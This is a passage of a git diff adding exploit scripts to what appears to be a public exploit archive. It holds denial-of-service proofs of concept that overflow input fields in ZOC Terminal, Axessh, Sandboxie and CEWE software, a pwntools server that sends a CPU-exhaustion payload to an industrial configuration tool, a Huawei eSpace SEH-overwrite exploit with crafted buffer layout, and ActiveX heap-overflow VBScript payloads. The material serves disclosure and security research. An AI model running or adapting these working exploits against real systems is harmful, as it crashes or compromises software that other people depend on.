+# 1.- Run the python script "MP4Converter.py", it will create a new file "MP4Converter.txt"
+# 2.- Copy the text from the generated MP4Converter.txt file to clipboard
+# 3.- Open MP4 Converter
+# 4.- Select 'Options' > 'Video/Audio Formats'
+# 5.- Click 'Add Preset' and paste clipboard in the field 'Name'
+# 6.- Click 'OK' and click 'Reset All' 
+# 7.- Crashed
+
+buffer = "\x41" * 10000
+f = open ("MP4Converter.txt", "w")
+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/46855.py b/exploits/windows/dos/46855.py
new file mode 100755
index 000000000..622cb0f63
--- /dev/null
+++ b/exploits/windows/dos/46855.py
@@ -0,0 +1,20 @@
+#Exploit Title:  ZOC Terminal v7.23.4  - 'Script' Denial of Service (PoC)
+#Discovery by: Victor Mondragón
+#Discovery Date: 2019-05-15
+#Vendor Homepage: https://www.emtec.com
+#Software Link: http://www.emtec.com/downloads/zoc/zoc7234_x64.exe
+#Tested Version: 7.23.4
+#Tested on: Windows 7 Service Pack 1 x64
+
+#Steps to produce the crash:
+#1.- Run python code: ZOC_Terminal_scr.py and it will create a new file "exp.zrx"
+#2.- Open ZOC Terminal
+#3.- Select Script > Start REXX Script... 
+#4.- Select "exp.zrx" file and click "open"
+#5.- Crashed
+
+cod = "\x41" * 20000
+
+f = open('exp.zrx', 'w')
+f.write(cod)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/46856.py b/exploits/windows/dos/46856.py
new file mode 100755
index 000000000..852cafe42
--- /dev/null
+++ b/exploits/windows/dos/46856.py
@@ -0,0 +1,22 @@
+#Exploit Title:  ZOC Terminal v7.23.4  - 'Private key file' Denial of Service (PoC)
+#Discovery by: Victor Mondragón
+#Discovery Date: 2019-05-15
+#Vendor Homepage: https://www.emtec.com
+#Software Link: http://www.emtec.com/downloads/zoc/zoc7234_x64.exe
+#Tested Version: 7.23.4
+#Tested on: Windows 7 Service Pack 1 x64
+
+#Steps to produce the crash:
+#1.- Run python code: ZOC_Terminal_pkf.py
+#2.- Open zoc_pkf.txt and copy content to clipboard
+#3.- Open ZOC Terminal
+#4.- Select File > Create SSH Key Files... 
+#5.- Select "Private key file:" field erease and Paste ClipBoard 
+#6.- Click on "Create public/private key files..."
+#7.- Crashed
+
+cod = "\x41" * 2000
+
+f = open('zoc_pkf.txt', 'w')
+f.write(cod)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/46857.py b/exploits/windows/dos/46857.py
new file mode 100755
index 000000000..0c4a36eb7
--- /dev/null
+++ b/exploits/windows/dos/46857.py
@@ -0,0 +1,23 @@
+#Exploit Title:  ZOC Terminal v7.23.4  - 'Shell' Denial of Service (PoC)
+#Discovery by: Victor Mondragón
+#Discovery Date: 2019-05-15
+#Vendor Homepage: https://www.emtec.com
+#Software Link: http://www.emtec.com/downloads/zoc/zoc7234_x64.exe
+#Tested Version: 7.23.4
+#Tested on: Windows 7 Service Pack 1 x64
+
+#Steps to produce the crash:
+#1.- Run python code: ZOC_Terminal_sh.py
+#2.- Open zoc_sh.txt and copy content to clipboard
+#3.- Open ZOC Terminal
+#4.- Select Options > Program Settings... > Special Files
+#5.- Select "Shell" field erease the content and Paste ClipBoard 
+#6.- Click on "Save"
+#7.- Select View > "Command Shell" and select "ok"
+#8.- Crashed
+
+cod = "\x41" * 270
+
+f = open('zoc_sh.txt', 'w')
+f.write(cod)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/46858.py b/exploits/windows/dos/46858.py
new file mode 100755
index 000000000..07953169d
--- /dev/null
+++ b/exploits/windows/dos/46858.py
@@ -0,0 +1,23 @@
+#Exploit Title: Axessh 4.2 'Log file name' - Denial of Service (PoC)
+#Discovery by: Victor Mondragón
+#Discovery Date: 2019-05-14
+#Vendor Homepage: http://www.labf.com
+#Software Link: http://www.labf.com/download/axessh.exe
+#Tested Version: 4.2
+#Tested on: Windows 7 Service Pack 1 x32
+
+#Steps to produce the crash:
+#1.- Run python code: Axessh_4.2.py
+#2.- Open Axess.txt and copy content to clipboard
+#3.- Open Axessh.exe
+#4.- In "Telnet Connect Host" select "Details>>" > "Settings"
+#5.- Select "Logging" and enable "Log all sessions output"
+#6.- In "Log file name" paste Clipboard
+#7.- Select "OK" and in "Telnet Connect Host" select "Ok"
+#8.- Crashed
+
+cod = "\x41" * 500
+
+f = open('Axess.txt', 'w')
+f.write(cod)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/46859.py b/exploits/windows/dos/46859.py
new file mode 100755
index 000000000..25ab7b31a
--- /dev/null
+++ b/exploits/windows/dos/46859.py
@@ -0,0 +1,69 @@
+#!/usr/bin/env python
+# coding: utf8
+#
+#
+# SEL AcSELerator Architect 2.2.24 Remote CPU Exhaustion Denial of Service
+#
+#
+# Vendor: Schweitzer Engineering Laboratories, Inc.
+# Product web page: https://www.selinc.com
+# Affected version: 2.2.24.0 (ICD package version: 2.38.0)
+#
+# Summary: Substation communications networks using the IEC 61850
+# MMS and GOOSE protocols require a systemic methodology to configure
+# message publications and subscriptions. acSELerator Architect
+# SEL-5032 Software is a Microsoft Windows application that streamlines
+# the configuration and documentation of IEC 61850 control and SCADA
+# communications.
+#
+# Description: AcSELerator Architect is prone to a denial-of-service (DoS)
+# vulnerability. An attacker may exploit this issue to cause CPU exhaustion,
+# resulting in application rendered non-responsive (AppHangB1 event).
+#
+# Tested on: Microsoft Windows 7 Ultimate SP1 (EN) 32bit
+#
+# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+#
+#
+# Advisory: https://applied-risk.com/index.php/download_file/view/106/165
+# ICS-CERT: https://ics-cert.us-cert.gov/advisories/ICSA-18-191-02
+# CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-10608
+#
+# 22.02.2018
+#
+
+from pwn import *
+
+cool_data = '\x4A' * 54321
+
+def bunn():
+
+    print """
+    ####################################
+     SEL AcSELerator Architect 2.2.24.0
+      FTP Client Remote CPU Exhaustion
+                 
+                 (c) 2018
+    ####################################
+    """
+
+def main():
+
+    p = listen(2121)
+    try:
+        log.warn('Payload ready for deployment...(Ctrl-C for exit)\n')
+        while True:
+            p.wait_for_connection()
+            if p:
+                sys.stdout.write('▓≡')
+                p.send(cool_data)
+    except KeyboardInterrupt:
+        p.success('OK!')
+        p.close()
+    except EOFError:
+        print "Unexpected error brah:", sys.exc_info()[0]
+        p.close()
+
+if __name__ == '__main__':
+    bunn()
+    main()
\ No newline at end of file
diff --git a/exploits/windows/dos/46860.py b/exploits/windows/dos/46860.py
new file mode 100755
index 000000000..db337f61b
--- /dev/null
+++ b/exploits/windows/dos/46860.py
@@ -0,0 +1,22 @@
+# -*- coding: utf-8 -*-
+# Exploit Title: Sandboxie 5.30 - Denial of Service (PoC)
+# Date: 16/05/2019
+# Author: Alejandra Sánchez
+# Vendor Homepage: https://www.sandboxie.com
+# Software https://www.sandboxie.com/SandboxieInstall.exe
+# Version: 5.30
+# Tested on: Windows 10
+
+# Proof of Concept:
+# 1.- Run the python script 'Sandboxie.py', it will create a new file 'Sandboxie.txt'
+# 2.- Copy the text from the generated Sandboxie.txt file to clipboard
+# 3.- Open Sandboxie Control
+# 4.- Go to 'Configure' > 'Programs Alerts'
+# 5.- Click 'Add Program', paste clipboard in the field 'Select or enter a program' and click 'OK'
+# 6.- Click 'OK' and crashed
+
+buffer = "\x41" * 5000
+
+f = open ("Sandboxie.txt", "w")
+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/46861.py b/exploits/windows/dos/46861.py
new file mode 100755
index 000000000..40d88004b
--- /dev/null
+++ b/exploits/windows/dos/46861.py
@@ -0,0 +1,21 @@
+# -*- coding: utf-8 -*-
+# Exploit Title: CEWE PHOTO SHOW 6.4.3 - Denial of Service (PoC)
+# Date: 16/05/2019
+# Author: Alejandra Sánchez
+# Vendor Homepage: https://cewe-photoworld.com/
+# Software: https://cewe-photoworld.com/creator-software/windows-download
+# Version: 6.4.3
+# Tested on: Windows 10
+
+# Proof of Concept:
+# 1.- Run the python script 'photoshow.py', it will create a new file 'photoshow.txt'
+# 2.- Copy the text from the generated photoshow.txt file to clipboard
+# 3.- Open CEWE PHOTO SHOW
+# 4.- Click 'Upload'
+# 5.- Paste clipboard in the field 'Password' and crashed
+
+buffer = "\x41" * 5000
+
+f = open ("photoshow.txt", "w")
+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/46862.py b/exploits/windows/dos/46862.py
new file mode 100755
index 000000000..c31ac0c16
--- /dev/null
+++ b/exploits/windows/dos/46862.py
@@ -0,0 +1,20 @@
+# -*- coding: utf-8 -*-
+# Exploit Title: CEWE PHOTO IMPORTER 6.4.3 - Denial of Service (PoC)
+# Date: 16/05/2019
+# Author: Alejandra Sánchez
+# Vendor Homepage: https://cewe-photoworld.com/
+# Software: https://cewe-photoworld.com/creator-software/windows-download
+# Version: 6.4.3
+# Tested on: Windows 10
+
+# Proof of Concept:
+# 1.- Run the python script 'photoimporter.py',it will create a new file "sample.jpg"
+# 2.- Open CEWE PHOTO IMPORTER
+# 3.- Select the 'sample.jpg' file created and click 'Import all'
+# 4.- Click 'Next' and 'Next', you will see a crash
+
+buffer = "\x41" * 500000
+
+f = open ("sample.jpg", "w")
+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/46865.py b/exploits/windows/dos/46865.py
new file mode 100755
index 000000000..81f55737e
--- /dev/null
+++ b/exploits/windows/dos/46865.py
@@ -0,0 +1,200 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+#
+# Huawei eSpace Meeting cenwpoll.dll Unicode Stack Buffer Overflow with SEH Overwrite
+#
+#
+# Vendor: Huawei Technologies Co., Ltd.
+# Product web page: https://www.huawei.com
+# Affected application: eSpace 1.1.11.103 (aka eSpace ECS, eSpace Desktop, eSpace Meeting, eSpace UC)
+# Affected application: Mobile Office eConference V200R003C01 6.0.0.268.v67290
+# Affected module: cenwpoll.dll 1.0.8.8
+# Binaries affected: mcstub.exe, classreader.exe, offlinepolledit.exe, eSpace.exe
+#
+# Product description:
+# --------------------
+# 1. Create more convenient Enhanced Communications (EC) services for your enterprise with this suite of
+# products. Huawei’s EC Suite (ECS) solution combines voice, data, video, and service streams, and provides
+# users with easy and secure access to their service platform from any device, in any place, at any time.
+# 2. The eSpace Meeting allows you to join meetings that support voice, data, and video functions using
+# the PC client, the tablet client, or an IP phone, or in a meeting room with an MT deployed.
+#
+# Vulnerability description:
+# --------------------------
+# eSpace Meeting is prone to a stack-based buffer overflow vulnerability (seh overwrite) because it fails
+# to properly bounds-check user-supplied data before copying it into an insufficiently sized buffer when
+# handling QES files. Attackers can exploit this issue to execute arbitrary code within the context of
+# the affected application. Failed exploit attempts will likely result in denial-of-service conditions.
+#
+# Tested on:
+# ----------
+# OS Name: Microsoft Windows 7 Professional
+# OS Version: 6.1.7601 Service Pack 1 Build 7601
+# RAM 4GB, System type: 32bit, Processor: Intel(R) Core(TM) i5-4300U CPU 1.90GHz 2.50GHz
+#
+# Vulnerability discovered by:
+# ----------------------------
+# Gjoko 'LiquidWorm' Krstic
+# Senior STTE
+# SCD-ERC
+# Munich, Germany
+# 26th of August (Tuesday), 2014
+#
+# PSIRT details:
+# --------------
+# Security advisory No.: Huawei-SA-20141217- espace
+# Initial release date: Dec 17, 2014
+# Vulnerability ID: HWPSIRT-2014-1151
+# CVE ID: CVE-2014-9415
+# Patched version: eSpace Meeting V100R001C03
+# Advisory URL: https://www.huawei.com/en/psirt/security-advisories/hw-406589
+# 
+#
+# ------------------------------------ WinDBG output ------------------------------------
+#
+# m_dwCurrentPos = 0 ,dwData = 591 ,m_dwGrowSize = 4096(1db0.1828): Access violation - code c0000005 (first chance)
+# First chance exceptions are reported before any exception handling.
+# This exception may be expected and handled.
+# eax=00000000 ebx=00410041 ecx=00000000 edx=00000578 esi=08de1ad8 edi=00410045
+# eip=05790f3e esp=02fc906c ebp=02fecd00 iopl=0         nv up ei pl zr na pe nc
+# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
+# *** WARNING: Unable to verify checksum for C:\Program Files\eSpace-ecs\conf\cwbin\cenwpoll.dll
+# *** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\eSpace-ecs\conf\cwbin\cenwpoll.dll - 
+# cenwpoll!DllUnregisterServer+0xa59e:
+# 05790f3e 8178082c010000  cmp     dword ptr [eax+8],12Ch ds:0023:00000008=????????
+# 0:008> !exchain
+# 02feccf4: *** WARNING: Unable to verify checksum for C:\Program Files\eSpace-ecs\conf\cwbin\mcstub.exe
+# *** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\eSpace-ecs\conf\cwbin\mcstub.exe
+# mcstub+10041 (00410041)
+# Invalid exception stack at 00410041
+# Instruction Address: 0x0000000005790f3e
+# 
+# Description: Exception Handler Chain Corrupted
+# Short Description: ExceptionHandlerCorrupted
+# Exploitability Classification: EXPLOITABLE
+# Recommended Bug Title: Exploitable - Exception Handler Chain Corrupted starting at cenwpoll!DllUnregisterServer+0x000000000000a59e (Hash=0xbc5aacab.0x6c23bb0b)
+#
+# Corruption of the exception handler chain is considered exploitable
+#
+# 0:008> d ebp
+# 02fecd00  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
+# 02fecd10  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
+# 02fecd20  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
+# 02fecd30  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
+# 02fecd40  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
+# 02fecd50  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
+# 02fecd60  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
+# 02fecd70  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
+# 0:008> u ebp
+# 02fecd00 41              inc     ecx
+# 02fecd01 004100          add     byte ptr [ecx],al
+# 02fecd04 41              inc     ecx
+# 02fecd05 004100          add     byte ptr [ecx],al
+# 02fecd08 41              inc     ecx
+# 02fecd09 004100          add     byte ptr [ecx],al
+# 02fecd0c 41              inc     ecx
+# 02fecd0d 004100          add     byte ptr [ecx],al
+#
+# ------------------------------------ /WinDBG output ------------------------------------
+#
+#
+
+import sys, os, time
+
+os.system('title jterm')
+os.system('color f5')
+os.system('cls')
+piton = os.path.basename(sys.argv[0])
+
+def usage():
+	print '''
+	+---------------------------------------------+
+	|  eSpace Meeting Stack Buffer Overflow Vuln  |
+	|                                             |
+	|         Vuln ID: HWPSIRT-2014-1151          |
+	|            CVE ID: CVE-2014-9415            |
+	+---------------------------------------------+
+	'''
+	if len(sys.argv) < 2:
+		print 'Usage: \n\n\t'+piton+' <OPTION>'
+		print '\nOPTION:\n'
+		print '\t0 - Create the evil PoC file.'
+		print '\t1 - Create the evil file, start the vulnerable application and crash it.'
+		print '\t2 - Create the evil file, start the vulnerable application under Windows Debugger with SEH chain info.\n'
+		quit()
+
+usage()
+crash = sys.argv[1]
+
+dir = os.getcwd();
+file = "evilpoll.qes"
+header = '\x56\x34\x78\x12\x01\x00\x09\x00' # V4x.....
+
+time.sleep(1)
+# Overwrite FS:[0] chain (\x43 = EIP)
+buffer = '\x41' * 353 +'\x42' * 2 +'\x43' * 2 +'\x44' * 42 +'New Poll' # \x44 can be incremented (byte space for venetian shellcode)
+buffer += '\x00\x01\x00\x00\x00\x00\x00\x90'
+buffer += '\x85\xA9\xD7\x00\x01\x04\x00'
+buffer += 'TEST'+'\x01\x02\x05\x00'
+buffer += 'ANSW1'+'\x05\x00'
+buffer += 'ANSW2'
+
+poc = header + buffer
+bytes = len(poc)
+
+print '[+] Creating evil PoC file...'
+time.sleep(1)
+print '[+] Buffering:\n'
+time.sleep(1)
+
+index = 0
+while index < len(poc):
+	char = poc[index]
+	#print char,
+	sys.stdout.write(char)
+	time.sleep(10.0 / 1000.0)
+	index = index + 1
+
+try:
+	writeFile = open (file, 'w')
+	writeFile.write( poc )
+	writeFile.close()
+	time.sleep(1)
+	print '\n\n[+] File \"'+file+'\" successfully created!'
+	time.sleep(1)
+	print '[+] Location: "'+dir+'"'
+	print '[+] Wrote '+str(bytes)+' bytes.'
+except:
+	print '[-] Error while creating file!\n'
+
+if crash == '0':
+	print '\n\n[+] Done!\n'
+elif crash == '1':
+	print '[+] The script will now execute the vulnerable application with the PoC file as its argument.\n'
+	os.system('pause')
+	os.system('C:\\Progra~1\\eSpace-ecs\\conf\\cwbin\\classreader.exe "%~dp0evilpoll.qes"')
+elif crash == '2':
+	print '[+] The script will now execute the vulnerable application with the PoC file as its argument under Windows Debugger.\n'
+	os.system('pause')
+	os.system('C:\\Progra~1\\Debugg~1\\windbg.exe -Q -g -c "!exchain" -o "C:\\Progra~1\eSpace-ecs\conf\cwbin\classreader.exe" "%~dp0evilpoll.qes"')
+	print '\n[+] You should see something like this in WinDBG:'
+	print '''
+	0:000> d 0012e37c
+	0012e37c  42 00 42 00 43 00 43 00-44 00 44 00 44 00 44 00  B.B.C.C.D.D.D.D.
+	0012e38c  44 00 44 00 44 00 44 00-44 00 44 00 44 00 44 00  D.D.D.D.D.D.D.D.
+	0012e39c  44 00 44 00 44 00 44 00-44 00 44 00 44 00 44 00  D.D.D.D.D.D.D.D.
+	0012e3ac  44 00 44 00 44 00 44 00-44 00 44 00 44 00 44 00  D.D.D.D.D.D.D.D.
+	0012e3bc  44 00 44 00 44 00 44 00-44 00 44 00 44 00 44 00  D.D.D.D.D.D.D.D.
+	0012e3cc  44 00 44 00 44 00 44 00-44 00 44 00 4e 00 65 00  D.D.D.D.D.D.N.e.
+	0012e3dc  77 00 20 00 50 00 6f 00-6c 00 6c 00 00 00 00 00  w. .P.o.l.l.....
+	0012e3ec  c2 01 00 00 56 34 78 12-70 09 87 02 00 00 00 00  ....V4x.p.......
+	0:000> !exchain
+	0012e37c: 00430043
+	Invalid exception stack at 00420042
+	'''
+else:
+	print '[+] Have a nice day! ^^\n'
+	quit()
+
+print '\n[+] Have a nice day! ^^\n'
+#os.system('color 07')
\ No newline at end of file
diff --git a/exploits/windows/dos/46867.txt b/exploits/windows/dos/46867.txt
new file mode 100644
index 000000000..2262b09d4
--- /dev/null
+++ b/exploits/windows/dos/46867.txt
@@ -0,0 +1,130 @@
+Huawei eSpace Meeting Image File Format Handling Buffer Overflow Vulnerability
+
+
+Vendor: Huawei Technologies Co., Ltd.
+Product web page: https://www.huawei.com
+Affected version: eSpace 1.1.11.103 (aka eSpace ECS, eSpace Desktop, eSpace Meeting, eSpace UC)
+
+Summary: Create more convenient Enhanced Communications (EC) services for your
+enterprise with this suite of products. Huawei’s EC Suite (ECS) solution combines
+voice, data, video, and service streams, and provides users with easy and secure
+access to their service platform from any device, in any place, at any time. The
+eSpace Meeting allows you to join meetings that support voice, data, and video
+functions using the PC client, the tablet client, or an IP phone, or in a meeting
+room with an MT deployed.
+
+Desc: eSpace Meeting conference whiteboard functionality is vulnerable to a buffer
+overflow issue when inserting known image file formats. Attackers can exploit this
+issue to execute arbitrary code within the context of the affected application.
+Failed exploit attempts will likely result in denial-of-service conditions.
+
+Vuln modules (no DEP/ASLR):
+C:\Program Files\eSpace-ecs\conf\cwbin\classmgr.dll
+C:\Program Files\eSpace-ecs\conf\cwbin\MiniGDIEx.dll
+
+Tested on: Microsoft Windows 7 Professional
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+
+23.09.2014
+
+Patched version: V100R001C03
+Vuln ID: HWPSIRT-2014-1156
+CVE ID: CVE-2014-9417
+Advisory: https://www.huawei.com/en/psirt/security-advisories/hw-406589
+
+--
+
+
+Reference magic numbers (hex signature):
+
+JPG/JPEG - FF D8 FF
+BMP - 42 4D
+PNG - 89 50 4E 47 0D 0A 1A 0A
+
+0:024> g
+CClassMgrFrameWnd::OnKeyUp lParam = -1072758783Get config of string parameter:box, value: 
+(2110.2258): Unknown exception - code c0000002 (first chance)
+(2110.2258): Unknown exception - code c0000002 (first chance)
+(2110.1b08): C++ EH exception - code e06d7363 (first chance)
+(2110.1b08): C++ EH exception - code e06d7363 (!!! second chance !!!)
+eax=036de3f4 ebx=01709870 ecx=00000003 edx=00000000 esi=7c380edc edi=036de484
+eip=75ae812f esp=036de3f4 ebp=036de444 iopl=0         nv up ei pl nz ac po nc
+cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000212
+*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Windows\system32\KERNELBASE.dll - 
+KERNELBASE!RaiseException+0x54:
+75ae812f c9              leave
+0:008> d esp
+*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\eSpace-ecs\conf\cwbin\MSVCR71.dll - 
+036de3f4  63 73 6d e0 01 00 00 00-00 00 00 00 2f 81 ae 75  csm........./..u
+036de404  03 00 00 00 20 05 93 19-98 e4 6d 03 30 82 3d 7c  .... .....m.0.=|
+036de414  00 00 00 00 18 00 00 00-14 33 41 7c 60 e4 6d 03  .........3A|`.m.
+036de424  b3 16 34 7c 00 00 9c 01-00 00 00 00 b8 16 34 7c  ..4|..........4|
+036de434  44 4b 41 7c 98 e4 6d 03-70 98 70 01 98 98 70 01  DKA|..m.p.p...p.
+036de444  84 e4 6d 03 ed 9a 35 7c-63 73 6d e0 01 00 00 00  ..m...5|csm.....
+036de454  03 00 00 00 78 e4 6d 03-98 98 70 01 54 16 3d 7c  ....x.m...p.T.=|
+036de464  63 73 6d e0 01 00 00 00-00 00 00 00 00 00 00 00  csm.............
+0:008> d
+036de474  03 00 00 00 20 05 93 19-98 e4 6d 03 30 82 3d 7c  .... .....m.0.=|
+036de484  a8 e4 6d 03 5a 8b 3c 7c-98 e4 6d 03 30 82 3d 7c  ..m.Z.<|..m.0.=|
+036de494  54 2b fc ab 54 16 3d 7c-58 a9 71 01 01 00 00 00  T+..T.=|X.q.....
+036de4a4  70 16 3d 7c 3c e8 6d 03-e0 d9 b0 04 00 00 00 00  p.=|<.m.........
+036de4b4  66 13 af 04 54 2b fc ab-80 94 6f 01 3c e8 6d 03  f...T+....o.<.m.
+036de4c4  30 ed 6d 03 00 00 00 00-ec e4 6d 03 00 00 00 00  0.m.......m.....
+036de4d4  0b 00 00 00 00 00 00 00-41 41 41 41 41 41 41 41  ........AAAAAAAA
+036de4e4  41 41 41 41 41 41 41 41-28 00 00 00 41 41 00 00  AAAAAAAA(...AA..
+0:008> d
+036de4f4  41 41 00 00 41 41 41 41-00 00 00 00 54 2b fc ab  AA..AAAA....T+..
+036de504  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
+036de514  00 00 00 00 24 ed 6d 03-22 a0 af 76 43 f0 ed 63  ....$.m."..vC..c
+036de524  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
+036de534  30 ed 6d 03 45 76 58 06-42 4d 00 0d 41 41 41 41  0.m.EvX.BM..AAAA
+036de544  41 41 41 41 41 41 6d 03-3b 23 af 04 3c e8 6d 03  AAAAAAm.;#..<.m.
+036de554  80 94 6f 01 88 ef 6d 03-05 02 00 00 00 00 00 00  ..o...m.........
+036de564  73 00 70 00 84 f2 b0 04-00 00 00 00 00 00 00 00  s.p.............
+0:008> d
+036de574  42 4d 00 0d 41 41 41 41-41 41 41 41 41 41 41 41  BM..AAAAAAAAAAAA
+036de584  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
+036de594  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
+036de5a4  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
+036de5b4  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
+036de5c4  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
+036de5d4  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
+036de5e4  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
+
+--
+
+PNG Decoder error msg:$s
+Invalid parameter passed to C runtime function.
+Invalid parameter passed to C runtime function.
+(1874.2274): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+eax=00000000 ebx=00000000 ecx=015d8998 edx=00000000 esi=015d8ab8 edi=00000000
+eip=025f1b99 esp=032ccc88 ebp=032cd0c4 iopl=0         nv up ei pl nz na po nc
+cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
+*** WARNING: Unable to verify checksum for C:\Program Files\eSpace-ecs\conf\cwbin\classmgr.dll
+*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\eSpace-ecs\conf\cwbin\classmgr.dll - 
+classmgr+0x11b99:
+025f1b99 8b9868060000    mov     ebx,dword ptr [eax+668h] ds:0023:00000668=????????
+
+--
+
+JPEG datastream contains no image
+Improper call to JPEG library in state 200
+(1f88.2768): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+eax=00000000 ebx=00000000 ecx=a2afcfb5 edx=00000000 esi=0352e318 edi=000000cc
+eip=0491b035 esp=0352e2c8 ebp=0352ed30 iopl=0         nv up ei ng nz ac pe cy
+cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010297
+*** WARNING: Unable to verify checksum for C:\Program Files\eSpace-ecs\conf\cwbin\MiniGDIEx.DLL
+*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\eSpace-ecs\conf\cwbin\MiniGDIEx.DLL - 
+MiniGDIEx!DllUnregisterServer+0x2f95:
+0491b035 ff10            call    dword ptr [eax]      ds:0023:00000000=????????
+
+---
+
+PoC files:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/46867.zip
\ No newline at end of file
diff --git a/exploits/windows/dos/46868.txt b/exploits/windows/dos/46868.txt
new file mode 100644
index 000000000..0de43a809
--- /dev/null
+++ b/exploits/windows/dos/46868.txt
@@ -0,0 +1,85 @@
+Huawei eSpace Meeting ContactsCtrl.dll and eSpaceStatusCtrl.dll ActiveX Heap Overflow
+
+
+Vendor: Huawei Technologies Co., Ltd.
+Product web page: https://www.huawei.com
+Affected version: eSpace 1.1.11.103 (aka eSpace ECS, eSpace Desktop, eSpace Meeting, eSpace UC)
+                  eSpace UC V200R002C02
+
+Summary: Create more convenient Enhanced Communications (EC) services for your
+enterprise with this suite of products. Huawei’s EC Suite (ECS) solution combines
+voice, data, video, and service streams, and provides users with easy and secure
+access to their service platform from any device, in any place, at any time. The
+eSpace Meeting allows you to join meetings that support voice, data, and video
+functions using the PC client, the tablet client, or an IP phone, or in a meeting
+room with an MT deployed.
+
+Desc: eSpace Meeting suffers from a heap-based memory overflow vulnerability when parsing
+large amount of bytes to the 'strNum' string parameter in GetNameyNum() in 'ContactsCtrl.dll'
+and 'strName' string parameter in SetUserInfo() in eSpaceStatusCtrl.dll library, resulting
+in heap memory corruption. An attacker can gain access to the system of the affected node
+and execute arbitrary code.
+
+Vuln ActiveX controls:
+C:\Program Files\eSpace-ecs\ContactsCtrl.dll
+C:\Program Files\eSpace-ecs\eSpaceStatusCtrl.dll
+
+Tested on: Microsoft Windows 7 Professional
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+
+23.09.2014
+
+Patched version: V200R001C03
+Vuln ID: HWPSIRT-2014-1157
+CVE ID: CVE-2014-9418
+Advisory: https://www.huawei.com/en/psirt/security-advisories/hw-406589
+
+--
+
+
+ContactsCtrl.dll PoC and debug output:
+
+<object classid='clsid:B53B93C2-6B0D-4D30-B46D-12F64E809B6D' id='target' />
+<script language='vbscript'>
+targetFile = "C:\Program Files\eSpace-ecs\ContactsCtrl.dll"
+prototype  = "Function GetNameByNum ( ByVal strNum As String ) As String"
+memberName = "GetNameByNum"
+progid     = "ContactsCtrlLib.ContactWnd"
+argCount   = 1
+arg1=String(616400, "A")
+target.GetNameByNum arg1 
+
+0:000> d esi
+04170024  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
+04170034  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
+04170044  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
+04170054  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
+04170064  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
+04170074  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
+04170084  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
+04170094  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
+
+
+eSpaceStatusCtrl.dll PoC and debug output:
+
+<object classid='clsid:93A44D3B-7CED-454F-BBB4-EE0AA340BB78' id='target' />
+<script language='vbscript'>
+targetFile = "C:\Program Files\eSpace-ecs\eSpaceStatusCtrl.dll"
+prototype  = "Sub SetUserInfo ( ByVal strAccount As String ,  ByVal staffNo As String ,  ByVal strName As String ,  ByVal status As Long )"
+memberName = "SetUserInfo"
